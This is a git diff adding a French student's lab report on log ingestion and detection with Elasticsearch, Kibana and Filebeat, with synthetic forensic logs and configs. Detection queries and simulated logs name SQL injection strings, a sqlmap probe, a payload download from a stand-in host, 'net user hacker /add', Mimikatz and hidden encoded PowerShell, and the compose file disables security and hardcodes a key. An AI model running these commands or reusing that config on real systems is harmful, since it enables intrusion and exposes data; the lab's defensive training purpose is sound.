diff --git a/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.md b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.md new file mode 100644 index 0000000..f399234 --- /dev/null +++ b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.md @@ -0,0 +1,235 @@ +# Lab 02 - Cybersecurity 3 +Installation Wazuh + +## 1. Mise en place + +Le `docker-compose.yml` a été modifié pour répondre aux dernières exigences ElasticSearch, incluant version, arguments et commandes d'amorçage. + +`filebeat.yml` a également été modifié pour la version 9.4.4. + +## 2. Démarrage de la stack + +![alt text](image.png) + +## 3. Ingestion des logs + +Les fichiers sont bien placés dans le dossier local `./data` et montés en *Read-Only* dans le conteneur `filebeat`. Une rapide inspection dans le conteneur permet de retrouver les documents : + +```bash +> docker exec -it filebeat bash + +[root@189c7e30152f filebeat]# ls +LICENSE.txt README.md fields.yml filebeat.reference.yml kibana module +NOTICE.txt data filebeat filebeat.yml logs modules.d + +[root@189c7e30152f filebeat]# pwd +/usr/share/filebeat + +[root@189c7e30152f filebeat]# ls /var/log +btmp hawkey.log lastlog powershell_eventlog.csv private webserver.log wtmp +``` + +## 4. Requêtes de détection + +On constate que les fichiers `filebeat-*` sont correctement journalisés dans ElasticSearch, avec du détail sous format JSON : + +![alt text](image-1.png) + +```json +{ + "@timestamp": [ + "2026-08-05T08:24:24.471Z" + ], + "agent.ephemeral_id": [ + "60ae4b96-7c76-4a10-b96a-aa2926124ac2" + ], + "agent.hostname": [ + "189c7e30152f" + ], + "agent.id": [ + "2b9a5d07-efbf-406e-88ba-21a632984a62" + ], + "agent.name": [ + "189c7e30152f" + ], + "agent.type": [ + "filebeat" + ], + "agent.version": [ + "9.4.4" + ], + "ecs.version": [ + "8.0.0" + ], + "fields.type": [ + "powershell" + ], + "host.name": [ + "189c7e30152f" + ], + "input.type": [ + "filestream" + ], + "log.file.device_id": [ + "74" + ], + "log.file.fingerprint": [ + "0552875f2772591c83e87ce749d75a90e9aa8aae5cc637f79755d3154df4ac37" + ], + "log.file.inode": [ + "12103423998720744" + ], + "log.file.path": [ + "/var/log/powershell_eventlog.csv" + ], + "log.offset": [ + 1661 + ], + "message": [ + "\"2025-07-29T14:40:10Z\",\"4720\",\"Information\",\"Microsoft-Windows-Security-Auditing\",\"Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs\"" + ], + "_id": "ZOMG0Z8BjDC_E0hYQKKW", + "_index": ".ds-filebeat-9.4.4-2026.08.05-000001", + "_score": null +} +``` + +Je mets à profit mon écran large et je fais un tri par champs pour avoir un détail pertinent sur les logs : + +![alt text](image-2.png) + +A cette occasion, je corrige les requêtes pour refléter les nouvelles normes utilisées sur ElasticSearch / OpenSearch, et un référent que j'utilise qui est Datadog : + +```sql +-- type:"web" AND (url:* OR query:*) AND message:"UNION SELECT" +fields.type:web AND message:("UNION SELECT" OR "union select" OR "'1'='1") + +-- type:"powershell" AND (message:*"New-Object Net.WebClient"* OR message:*"Invoke-Expression"*) +fields.type:powershell AND message:("New-Object Net.WebClient" OR "Invoke-*") + +-- type:"web" AND status:401 +fields.type:web AND message:(" 401 ") +``` + +## 6. Création du Dashboard + +### Créer des métriques + +Le seul champ reconnaissable par les logs est "message", qui contient les informations. En revanche, ElasticSearch ne gère "pas" nativement le CONTENU des messages en les compartimentant. Il faut pouvoir extraire ces données. La solution la plus efficace est de passer une instruction dans Filebeat, mais dans un vrai environnement de remontée de logs, on n'a que rarement accès à l'agent émetteur. Aussi va-t-on essayer de faire des métriques dans Kibana directement. + +Pour ça, je vais dans `Dev Tools > Console` et je fais, aidé de Kimi K2.7, un "Ingest Pipeline Conditionnel" : + +```json +PUT _ingest/pipeline/multi_log_parser +{ + "description": "Détecte et sépare les logs Web et PowerShell/Windows", + "processors": [ + { + "dissect": { + "description": "Parse les logs Web au format Apache/Nginx", + "if": "ctx.message != null && ctx.message.contains('HTTP/')", + "field": "message", + "pattern": "%{web_client_ip} - - [%{web_timestamp}] \"%{web_http_method} %{web_request_path} HTTP/%{web_http_version}\" %{web_status_code} %{web_bytes} \"%{web_referrer}\" \"%{web_user_agent}\"" + } + }, + { + "csv": { + "description": "Parse les logs Windows/PowerShell au format CSV", + "if": "ctx.message != null && (ctx.message.contains('Microsoft-Windows') || ctx.message.startsWith('\"202'))", + "field": "message", + "target_fields": [ + "pws_timestamp", + "pws_event_id", + "pws_level", + "pws_provider", + "pws_message" + ] + } + } + ] +} +``` + +![alt text](image-3.png) + +Pas de succès. Je tente alors avec `Stack Management > Data Views > Logs` de faire des champs personnalisés : + +```js +if (params._source.message != null) { + def msg = params._source.message; + if (msg instanceof List && !msg.isEmpty()) { msg = msg[0]; } + + // Exécute uniquement si le message ressemble au log Windows + if (msg instanceof String && msg.contains('Microsoft-Windows')) { + String[] parts = msg.splitOnToken('","'); + if (parts.length > 1) { + emit(parts[1].replace('"', '').trim()); // Extrait l'ID d'évènement + } + } +} +``` + +```js +if (params._source.message != null) { + def msg = params._source.message; + if (msg instanceof List && !msg.isEmpty()) { msg = msg[0]; } + + // Exécute uniquement si le message contient une requête HTTP + if (msg instanceof String && msg.contains('HTTP/')) { + String[] parts = msg.splitOnToken(' '); + if (parts.length >= 9) { + emit(parts[8].trim()); // Extrait le code de réponse (200, 401, 403...) + } + } +} +``` + +J'ai des résultats : + +![alt text](image-4.png) + +![alt text](image-5.png) + +Je peux maintenant faire un VRAI tableau avec mes métriques : + +![alt text](image-6.png) + +Et enfin faire une visualisation : + +![alt text](image-7.png) + +Hélas le jeu de données est + +## 7. Alertes automatisées + +Pour l'alerte demandée, je vais dans `Stack Management > Alerts and Insights > Rules` bien que ça ne soit pas très instinctif, mais pour les besoins du cours, il faudra y opérer. + +### Interruption + +![alt text](image-8.png) + +Je dois rajouter un élément au `kibana.yml` du conteneur : + +```yml +xpack.encryptedSavedObjects.encryptionKey: "ma_cle_secrete_super_longue_de_32_caracteres!" +``` + +J'édite aussi le `docker-compose.yml` pour déploiement automatique. + +Je définis les conditions de déclenchement (ici, très parano, faute de gros jeux de données) : + +![alt text](image-9.png) + +Pour les actions, je suis obligé d'activer la licence d'essai 30 jours (ça va, on a le temps) mais je n'ai que deux actions de disponibles, là om il y a normalement des dizaines de choix. + +**POUR LES BESOINS DE L'EXERCICE** je ne peux pas générer de WorkFlow complet. En revanche je peux montrer un exemple défini sur Datadog, utilisant un Webhook paramétré dans Slack pour prévenir les utilisateurs d'une instance EC2 qui tourne à vide : + +![alt text](image-10.png) + +J'ai déjà fait du déploiement : + +- Courriel +- JIRA OpsGenie +- Webhook Slack +- Webhook Discord +- Application WhatsApp pour les urgences VIP diff --git a/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.pdf b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.pdf new file mode 100644 index 0000000..2f079fe Binary files /dev/null and b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.pdf differ diff --git a/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.zip b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.zip new file mode 100644 index 0000000..b7e2e92 Binary files /dev/null and b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.zip differ diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences.zip b/Semaine_12/Jour_03/L03-forensic_lab_evidences.zip new file mode 100644 index 0000000..8f93acb Binary files /dev/null and b/Semaine_12/Jour_03/L03-forensic_lab_evidences.zip differ diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences/auth_failures.csv b/Semaine_12/Jour_03/L03-forensic_lab_evidences/auth_failures.csv new file mode 100644 index 0000000..adf95e0 --- /dev/null +++ b/Semaine_12/Jour_03/L03-forensic_lab_evidences/auth_failures.csv @@ -0,0 +1,6 @@ +Date,Time,SourceIP,Username,Status +2025-07-29,13:58:01,192.168.1.100,admin,Failed +2025-07-29,13:58:05,192.168.1.100,admin,Failed +2025-07-29,13:58:09,192.168.1.100,root,Failed +2025-07-29,13:58:12,192.168.1.100,root,Failed +2025-07-29,13:58:15,192.168.1.100,root,Success diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences/malware_processlist.csv b/Semaine_12/Jour_03/L03-forensic_lab_evidences/malware_processlist.csv new file mode 100644 index 0000000..bd5dd0e --- /dev/null +++ b/Semaine_12/Jour_03/L03-forensic_lab_evidences/malware_processlist.csv @@ -0,0 +1,4 @@ +PID,ProcessName,CommandLine,ParentPID +2345,svchost.exe,C:\Windows\System32\svchost.exe -k netsvcs,520 +3378,powershell.exe,powershell -nop -w hidden -enc SQB...=,2345 +3981,evil.exe,C:\Users\Public\evil.exe,3378 diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences/powershell_eventlog.csv b/Semaine_12/Jour_03/L03-forensic_lab_evidences/powershell_eventlog.csv new file mode 100644 index 0000000..2d8c436 --- /dev/null +++ b/Semaine_12/Jour_03/L03-forensic_lab_evidences/powershell_eventlog.csv @@ -0,0 +1,4 @@ +Date,Time,EventID,Message +2025-07-29,14:05:11,4104,Script PowerShell suspect exécuté : Invoke-Mimikatz +2025-07-29,14:07:25,4103,Commande PowerShell encodée détectée +2025-07-29,14:09:43,4688,Nouveau processus : powershell.exe -nop -w hidden diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences/webserver.log b/Semaine_12/Jour_03/L03-forensic_lab_evidences/webserver.log new file mode 100644 index 0000000..c24b39f --- /dev/null +++ b/Semaine_12/Jour_03/L03-forensic_lab_evidences/webserver.log @@ -0,0 +1,10 @@ +192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)" +192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" +192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable" +192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)" +192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q= HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)" +192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable" diff --git a/Semaine_12/Jour_03/L03-powershell_eventlog.csv b/Semaine_12/Jour_03/L03-powershell_eventlog.csv new file mode 100644 index 0000000..3d56265 --- /dev/null +++ b/Semaine_12/Jour_03/L03-powershell_eventlog.csv @@ -0,0 +1,11 @@ +"TimeCreated","Id","LevelDisplayName","ProviderName","Message" +"2025-07-29T14:23:51Z","4624","Information","Microsoft-Windows-Security-Auditing","Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3" +"2025-07-29T14:25:12Z","4625","Warning","Microsoft-Windows-Security-Auditing","Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect" +"2025-07-29T14:27:33Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1" +"2025-07-29T14:29:55Z","4689","Information","Microsoft-Windows-Security-Auditing","Un processus a été terminé. Nom du processus : powershell.exe, PID=4356" +"2025-07-29T14:31:12Z","4104","Information","Microsoft-Windows-PowerShell","Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe" +"2025-07-29T14:32:45Z","4100","Warning","Microsoft-Windows-PowerShell","Échec d'exécution du script en raison de la stratégie d'exécution" +"2025-07-29T14:34:20Z","7045","Information","Service Control Manager","Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe" +"2025-07-29T14:36:05Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add" +"2025-07-29T14:38:22Z","4624","Information","Microsoft-Windows-Security-Auditing","Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15" +"2025-07-29T14:40:10Z","4720","Information","Microsoft-Windows-Security-Auditing","Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs" diff --git a/Semaine_12/Jour_03/L03-webserver.log b/Semaine_12/Jour_03/L03-webserver.log new file mode 100644 index 0000000..c24b39f --- /dev/null +++ b/Semaine_12/Jour_03/L03-webserver.log @@ -0,0 +1,10 @@ +192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)" +192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" +192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable" +192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)" +192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q= HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)" +192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable" diff --git a/Semaine_12/Jour_03/Lab03.pdf b/Semaine_12/Jour_03/Lab03.pdf new file mode 100644 index 0000000..9daa3b1 Binary files /dev/null and b/Semaine_12/Jour_03/Lab03.pdf differ diff --git a/Semaine_12/Jour_03/M03-Modèle de Journal danalyse Forensique.pdf b/Semaine_12/Jour_03/M03-Modèle de Journal danalyse Forensique.pdf new file mode 100644 index 0000000..dfd430b Binary files /dev/null and b/Semaine_12/Jour_03/M03-Modèle de Journal danalyse Forensique.pdf differ diff --git a/Semaine_12/Jour_03/M03-Rapport dinvenstigation.pdf b/Semaine_12/Jour_03/M03-Rapport dinvenstigation.pdf new file mode 100644 index 0000000..996ad1f Binary files /dev/null and b/Semaine_12/Jour_03/M03-Rapport dinvenstigation.pdf differ diff --git a/Semaine_12/Jour_03/elastic_stack/data/powershell_eventlog.csv b/Semaine_12/Jour_03/elastic_stack/data/powershell_eventlog.csv new file mode 100644 index 0000000..3d56265 --- /dev/null +++ b/Semaine_12/Jour_03/elastic_stack/data/powershell_eventlog.csv @@ -0,0 +1,11 @@ +"TimeCreated","Id","LevelDisplayName","ProviderName","Message" +"2025-07-29T14:23:51Z","4624","Information","Microsoft-Windows-Security-Auditing","Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3" +"2025-07-29T14:25:12Z","4625","Warning","Microsoft-Windows-Security-Auditing","Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect" +"2025-07-29T14:27:33Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1" +"2025-07-29T14:29:55Z","4689","Information","Microsoft-Windows-Security-Auditing","Un processus a été terminé. Nom du processus : powershell.exe, PID=4356" +"2025-07-29T14:31:12Z","4104","Information","Microsoft-Windows-PowerShell","Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe" +"2025-07-29T14:32:45Z","4100","Warning","Microsoft-Windows-PowerShell","Échec d'exécution du script en raison de la stratégie d'exécution" +"2025-07-29T14:34:20Z","7045","Information","Service Control Manager","Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe" +"2025-07-29T14:36:05Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add" +"2025-07-29T14:38:22Z","4624","Information","Microsoft-Windows-Security-Auditing","Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15" +"2025-07-29T14:40:10Z","4720","Information","Microsoft-Windows-Security-Auditing","Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs" diff --git a/Semaine_12/Jour_03/elastic_stack/data/webserver.log b/Semaine_12/Jour_03/elastic_stack/data/webserver.log new file mode 100644 index 0000000..c24b39f --- /dev/null +++ b/Semaine_12/Jour_03/elastic_stack/data/webserver.log @@ -0,0 +1,10 @@ +192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)" +192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" +192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable" +192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)" +192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q= HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)" +192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" +192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable" diff --git a/Semaine_12/Jour_03/elastic_stack/docker-compose.yml b/Semaine_12/Jour_03/elastic_stack/docker-compose.yml new file mode 100644 index 0000000..5af7a71 --- /dev/null +++ b/Semaine_12/Jour_03/elastic_stack/docker-compose.yml @@ -0,0 +1,41 @@ +services: + elasticsearch: + image: docker.elastic.co/elasticsearch/elasticsearch:9.4.4 + container_name: elasticsearch + environment: + - discovery.type=single-node + - xpack.security.enabled=false + - "ES_JAVA_OPTS=-Xms1g -Xmx1g" + ports: + - "9200:9200" + healthcheck: + test: ["CMD-SHELL", "curl -fsS http://localhost:9200/_cluster/health >/dev/null || exit 1"] + interval: 30s + timeout: 10s + retries: 20 + start_period: 30s + + kibana: + image: docker.elastic.co/kibana/kibana:9.4.4 + container_name: kibana + ports: + - "5601:5601" + depends_on: + elasticsearch: + condition: service_healthy + environment: + - ELASTICSEARCH_HOSTS=http://elasticsearch:9200 + - xpack.encryptedSavedObjects.encryptionKey=ma_cle_secrete_super_longue_de_32_caracteres! + + filebeat: + image: docker.elastic.co/beats/filebeat:9.4.4 + container_name: filebeat + command: ["filebeat", "-e", "--strict.perms=false"] + user: root + volumes: + - ./data/webserver.log:/var/log/webserver.log:ro + - ./data/powershell_eventlog.csv:/var/log/powershell_eventlog.csv:ro + - ./filebeat.yml:/usr/share/filebeat/filebeat.yml:ro + depends_on: + elasticsearch: + condition: service_healthy diff --git a/Semaine_12/Jour_03/elastic_stack/filebeat.yml b/Semaine_12/Jour_03/elastic_stack/filebeat.yml new file mode 100644 index 0000000..7e41ac6 --- /dev/null +++ b/Semaine_12/Jour_03/elastic_stack/filebeat.yml @@ -0,0 +1,19 @@ +filebeat.inputs: + - type: filestream + id: web-logs + enabled: true + paths: + - /var/log/webserver.log + fields: + type: web + + - type: filestream + id: powershell-logs + enabled: true + paths: + - /var/log/powershell_eventlog.csv + fields: + type: powershell + +output.elasticsearch: + hosts: ["http://elasticsearch:9200"] diff --git a/Semaine_12/Jour_03/image-1.png b/Semaine_12/Jour_03/image-1.png new file mode 100644 index 0000000..66a97c8 Binary files /dev/null and b/Semaine_12/Jour_03/image-1.png differ diff --git a/Semaine_12/Jour_03/image-10.png b/Semaine_12/Jour_03/image-10.png new file mode 100644 index 0000000..b1a9233 Binary files /dev/null and b/Semaine_12/Jour_03/image-10.png differ diff --git a/Semaine_12/Jour_03/image-2.png b/Semaine_12/Jour_03/image-2.png new file mode 100644 index 0000000..1b4b77b Binary files /dev/null and b/Semaine_12/Jour_03/image-2.png differ diff --git a/Semaine_12/Jour_03/image-3.png b/Semaine_12/Jour_03/image-3.png new file mode 100644 index 0000000..966c92a Binary files /dev/null and b/Semaine_12/Jour_03/image-3.png differ diff --git a/Semaine_12/Jour_03/image-4.png b/Semaine_12/Jour_03/image-4.png new file mode 100644 index 0000000..561717a Binary files /dev/null and b/Semaine_12/Jour_03/image-4.png differ diff --git a/Semaine_12/Jour_03/image-5.png b/Semaine_12/Jour_03/image-5.png new file mode 100644 index 0000000..cd049a6 Binary files /dev/null and b/Semaine_12/Jour_03/image-5.png differ diff --git a/Semaine_12/Jour_03/image-6.png b/Semaine_12/Jour_03/image-6.png new file mode 100644 index 0000000..7f703fa Binary files /dev/null and b/Semaine_12/Jour_03/image-6.png differ diff --git a/Semaine_12/Jour_03/image-7.png b/Semaine_12/Jour_03/image-7.png new file mode 100644 index 0000000..250e58b Binary files /dev/null and b/Semaine_12/Jour_03/image-7.png differ diff --git a/Semaine_12/Jour_03/image-8.png b/Semaine_12/Jour_03/image-8.png new file mode 100644 index 0000000..71cde66 Binary files /dev/null and b/Semaine_12/Jour_03/image-8.png differ diff --git a/Semaine_12/Jour_03/image-9.png b/Semaine_12/Jour_03/image-9.png new file mode 100644 index 0000000..0570dac Binary files /dev/null and b/Semaine_12/Jour_03/image-9.png differ diff --git a/Semaine_12/Jour_03/image.png b/Semaine_12/Jour_03/image.png new file mode 100644 index 0000000..1c892e3 Binary files /dev/null and b/Semaine_12/Jour_03/image.png differ